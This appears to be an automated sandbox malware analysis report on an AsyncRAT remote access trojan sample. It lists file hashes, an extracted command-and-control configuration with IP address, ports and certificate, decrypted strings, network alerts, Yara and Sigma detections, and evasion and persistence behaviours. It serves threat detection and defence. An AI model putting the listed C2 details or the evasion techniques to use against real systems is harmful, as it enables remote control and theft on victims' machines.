Windows Analysis Report
PXUVmodpCYqRIPQ.exe

Overview

General Information

Sample name: PXUVmodpCYqRIPQ.exe
Analysis ID: 1606870
MD5: b12869ee25cc50e4ebb7c66fd75b7b35
SHA1: 765488b8536cd89a7bd8ef0100ef97e9d7014c34
SHA256: 5a283f2f193bd78816d21cc62d0bb67a5570bc631f5c3752444abc28515e542c
Tags: exeuser-malrpt
Infos:

Detection

AsyncRAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected AsyncRAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
AsyncRAT AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

AV Detection
barindex
Found malware configuration
Source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": ["192.3.189.150"], "Ports": ["6606", "7707", "8808"], "Certificate": "MIIE8jCCAtqgAwIBAgIQAKmy+2/kztJn/5FuswqT2zANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjUwMTMxMjIxNjA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKhcNawXx8qwCaSHxUEXkqH1Y2UwQTBAmtb5jrfKxx3o+FDnUK6P34HtQ6iTpJjGkYINmX4ud6tViFQdKmNVilVlJEOaz0fcNRD9pJwdoYjgj7C1D7U2Qp5/dTRcj0Hc0cM7NLTGpzcujWTRGfVNJXziOho4EvPs1XRy1jfiZBTmrnzXPCFqtslGWERRXkJx/fBq8f23M3k9Vujx8N4KUMRsQEv1QCZyw5wpiv8hQCodINXjKOklZOHPM9hlutqokjpNLvV81/iRf+Loxwi96MfYIdacPK30Xg16mV1+mbto/am3CczsmfC0sq1YvKwu8WLt3CBcIDJgLXVtGT3ueLXQ0qJ6l8pg4E+mnfsmgawPRxD8/3OMiWlI/uIzR9DYDmRG7EE+37gFcA3MNSxOAnI7Wf//7I2zegAYnSJ0txvm27zZh6g++diWwRoY7RxBZyqvqzCxzDzhsuv4HLnqHxIX/2t7Tp/TKIH+Ksk7JFqYf8EMILbrIwPmTdB3GkVziXpBXrW3thbMPgBudmBY6qVluJXxXhZoWd/R74RUaM4LNlRINyZblFrSDyKISFqiziQl/ygBgT2sqsrOgWlB5JpKxpQRBtXt+3WDz1HtUhqcVUKXT+vigcxFrRTf+E4g1KMndEJGwKSa0HAL6bCzPh1z6TH/x3jzCUcNm7GeFZ5xAgMBAAGjMjAwMB0GA1UdDgQWBBQEmb2kF+qeJc1Uw0ComismQl46fzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCT/BATPvJklOz97oyZsOpGai8CkAXjlPWCAaZN5FFGcp0Mq9yqJI578cl/WKIMWOjQpUavST4GggB2zgCxPQUlizf7W9ChKgNfh8/lq/ZeqtGdphA97upEphgUyJYGPpFG6V9Nd/Sg8MnoKHgZOKDC8ZWFfPEoHG9HyPBtk3o4fiOv/dNaLWJMoIi7WN3Mxjn6S7jPV0U19eyyBKp/QYFMYRIX4Q/7GR2te4weyfvubQrbugI+XvGgJhE8RZFNdrfYXHcPUugn9kr+mkOAClhOr2o19mEx8vUtziE2FzqokT9xpjOiIc5WSflwctSQE1DyJ/gNUAw9ehHPnVvuVphdRnLElb9cZGyP/EAFwcRvUFQt1QYNGzjXzY357OS6sQHmSK6XBpGTOp72mkKkA++GGK4iGgfAANT3JssUqEgkxKDwzw3yo28sd0jVh5hIcaM5DXX9mlV+pkXGhH6Hh56p3e4XO+N7fPEv/TASEH0wb8oJr9i4i9r+tB+KbszWtTzcmbZa/b/+ZpDGZ0p2W8s6HcKKoz57/ULoJUZoG3EXLWcaUVSNaA7BQwKbMT0KlgSPIDjnFLN+r19JOcTWINq4yLsECG/ecbt/4e891ix15Zqkcl4aTR5kVzzOjAtBnBcuzSj8Gzp+XNP2UiB4AHIT4XimffebAzjauTnkJ/ck+w=="}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Taskshell.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Virustotal: Detection: 52% Perma Link
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Virustotal: Detection: 52% Perma Link
Multi AV Scanner detection for submitted file
Source: PXUVmodpCYqRIPQ.exe ReversingLabs: Detection: 60%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: PXUVmodpCYqRIPQ.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: 6606,7707,8808
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: 192.3.189.150
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: 0.5.8
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: true
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: k5CBmR5JDsDg
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: MIIE8jCCAtqgAwIBAgIQAKmy+2/kztJn/5FuswqT2zANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjUwMTMxMjIxNjA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKhcNawXx8qwCaSHxUEXkqH1Y2UwQTBAmtb5jrfKxx3o+FDnUK6P34HtQ6iTpJjGkYINmX4ud6tViFQdKmNVilVlJEOaz0fcNRD9pJwdoYjgj7C1D7U2Qp5/dTRcj0Hc0cM7NLTGpzcujWTRGfVNJXziOho4EvPs1XRy1jfiZBTmrnzXPCFqtslGWERRXkJx/fBq8f23M3k9Vujx8N4KUMRsQEv1QCZyw5wpiv8hQCodINXjKOklZOHPM9hlutqokjpNLvV81/iRf+Loxwi96MfYIdacPK30Xg16mV1+mbto/am3CczsmfC0sq1YvKwu8WLt3CBcIDJgLXVtGT3ueLXQ0qJ6l8pg4E+mnfsmgawPRxD8/3OMiWlI/uIzR9DYDmRG7EE+37gFcA3MNSxOAnI7Wf//7I2zegAYnSJ0txvm27zZh6g++diWwRoY7RxBZyqvqzCxzDzhsuv4HLnqHxIX/2t7Tp/TKIH+Ksk7JFqYf8EMILbrIwPmTdB3GkVziXpBXrW3thbMPgBudmBY6qVluJXxXhZoWd/R74RUaM4LNlRINyZblFrSDyKISFqiziQl/ygBgT2sqsrOgWlB5JpKxpQRBtXt+3WDz1HtUhqcVUKXT+vigcxFrRTf+E4g1KMndEJGwKSa0HAL6bCzPh1z6TH/x3jzCUcNm7GeFZ5xAgMBAAGjMjAwMB0GA1UdDgQWBBQEmb2kF+qeJc1Uw0ComismQl46fzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCT/BATPvJklOz97oyZsOpGai8CkAXjlPWCAaZN5FFGcp0Mq9yqJI578cl/WKIMWOjQpUavST4GggB2zgCxPQUlizf7W9ChKgNfh8/lq/ZeqtGdphA97upEphgUyJYGPpFG6V9Nd/Sg8MnoKHgZOKDC8ZWFfPEoHG9HyPBtk3o4fiOv/dNaLWJMoIi7WN3Mxjn6S7jPV0U19eyyBKp/QYFMYRIX4Q/7GR2te4weyfvubQrbugI+XvGgJhE8RZFNdrfYXHcPUugn9kr+mkOAClhOr2o19mEx8vUtziE2FzqokT9xpjOiIc5WSflwctSQE1DyJ/gNUAw9ehHPnVvuVphdRnLElb9cZGyP/EAFwcRvUFQt1QYNGzjXzY357OS6sQHmSK6XBpGTOp72mkKkA++GGK4iGgfAANT3JssUqEgkxKDwzw3yo28sd0jVh5hIcaM5DXX9mlV+pkXGhH6Hh56p3e4XO+N7fPEv/TASEH0wb8oJr9i4i9r+tB+KbszWtTzcmbZa/b/+ZpDGZ0p2W8s6HcKKoz57/ULoJUZoG3EXLWcaUVSNaA7BQwKbMT0KlgSPIDjnFLN+r19JOcTWINq4yLsECG/ecbt/4e891ix15Zqkcl4aTR5kVzzOjAtBnBcuzSj8Gzp+XNP2UiB4AHIT4XimffebAzjauTnkJ/ck+w==
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: NSI0JibIgyOx4/xQu1E1Sp2Wd9DezaWp+kvX3BQH9yoaarCfS5vSxFcgk2Nsomy0rCpNpm8zJLTK79f7AWvFeVI92F5BxcHAIy4a9eYufNzv85xz6Wc7Trg9hOXiOoADqlJ47Xw51WhdQewfeD1eZVpMU6LeA0XTdrQP7Dz6IwuDO1R4UJpagXBm2+riUl4JLWYchBUrwVhsjgQkaLizXJ/4Zr2/XacQxX/63HrbqQBsDRaA/i7hKYb1VMFufeCFWjIROdXQHgZ9BdmDOGHV2iCr9AB8XAb3km0XXrqrvZ7Zd1Xzf1ZhtA8vVF5lskLm58doLngTCywRlrY/6IiIbfeUW0dZwYVAr+gwNzbnwc8G+sYeXnOFw9NbIpPYjGrFVJwm1d9MgH4t+Le7b70RU8P13wG6sKlU8y+c/38V6iJW2/HB5hMMPFTim+XuIIgvD/Jkpr9rNluOVBWsKpI2YXlFQDEs6ZWqIWD8nCHiTkC4JkQZVNgD7QYSxyb0lEp4N6FkXfky7qqiWKGTJXJBvTj8wHNXsUvQlWmuXPyb1SCtHMwViqgM+87zJKjCQ6CPjXcKF5HjJ1B+hh+BlqGKga88gSg4EYgPahtUsJwCagY5t/Vc4DMZkre3DvWhamasvd4xUWOVUChFFd0nYUIyeDYXZeM7OB61EgseQAXcGm8=
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: false
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: null
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: false
Source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack String decryptor: Default
Uses 32bit PE files
Source: PXUVmodpCYqRIPQ.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PXUVmodpCYqRIPQ.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\PXUVmodpCYqRIPQ.exe Code function: 4x nop then jmp 03189F7Ah 0_2_03189996
Source: C:\Users\user\AppData\Roaming\xcsUjVN.exe Code function: 4x nop then jmp 0B19925Bh 10_2_0B198C76
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 4x nop then jmp 026F9533h 21_2_026F8F4E
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 4x nop then jmp 0145925Bh 33_2_01458C76
Source: C:\Users\user\AppData\Roaming\Taskshell.exe Code function: 4x nop then jmp 0791925Bh 37_2_07918C76

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 192.3.189.150:8808 -> 192.168.2.4:49740
Source: Network traffic Suricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 192.3.189.150:8808 -> 192.168.2.4:49740
Source: Network traffic Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 192.3.189.150:8808 -> 192.168.2.4:49740
Source: Network traffic Suricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 192.3.189.150:8808 -> 192.168.2.4:49740
Yara detected Generic Downloader
Source: Yara match File source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.189.150
Source: xcsUjVN.exe, 00000014.00000002.2949551104.00000000014B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: xcsUjVN.exe, 00000014.00000002.2949551104.00000000014B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, PXUVmodpCYqRIPQ.exe, 00000009.00000002.1793564770.000000000314C000.00000004.00000800.00020000.00000000.sdmp, xcsUjVN.exe, 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, xcsUjVN.exe, 00000014.00000002.2954261509.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, xcsUjVN.exe, 00000014.00000002.2954261509.0000000003491000.00000004.00000800.00020000.00000000.sdmp, Taskshell.exe, 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, Taskshell.exe, 00000021.00000002.2026862188.000000000314A000.00000004.00000800.00020000.00000000.sdmp, Taskshell.exe, 00000025.00000002.2090225147.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: PXUVmodpCYqRIPQ.exe, 00000000.00000002.1767746688.0000000007502000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected AsyncRAT
Source: Yara match File source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.3057dd8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b28e9c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.304befc.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.31aabb4.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.31aabb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.3057dd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d46b08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d3ac2c.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b34d78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.319ecd8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.356ceec.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.xcsUjVN.exe.2d3ac2c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.Taskshell.exe.2b28e9c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.2.Taskshell.exe.304befc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.Taskshell.exe.319ecd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PXUVmodpCYqRIPQ.exe.3561010.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000014.00000002.2954261509.000000000362D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2026862188.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1760909850.0000000003507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1790797223.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1858382198.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2090225147.000000000304A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2954261509.0000000003491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1918167976.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 6792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: PXUVmodpCYqRIPQ.exe PID: 7204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xcsUjVN.exe PID: 7268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: xcsUjVN.exe PID: 7728, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Taskshell.exe PID: 7756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Taskshell.exe PID: 3852, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Taskshell.exe PID: 7576, type: MEMORYSTR

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 9.2.PXUVmodpCYqRIPQ.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 10.2.xcsUjVN.exe.2d46b08.1.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 21.2.Taskshell.exe.2b34d78.0.unpack, type: UNPACKEDPE Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
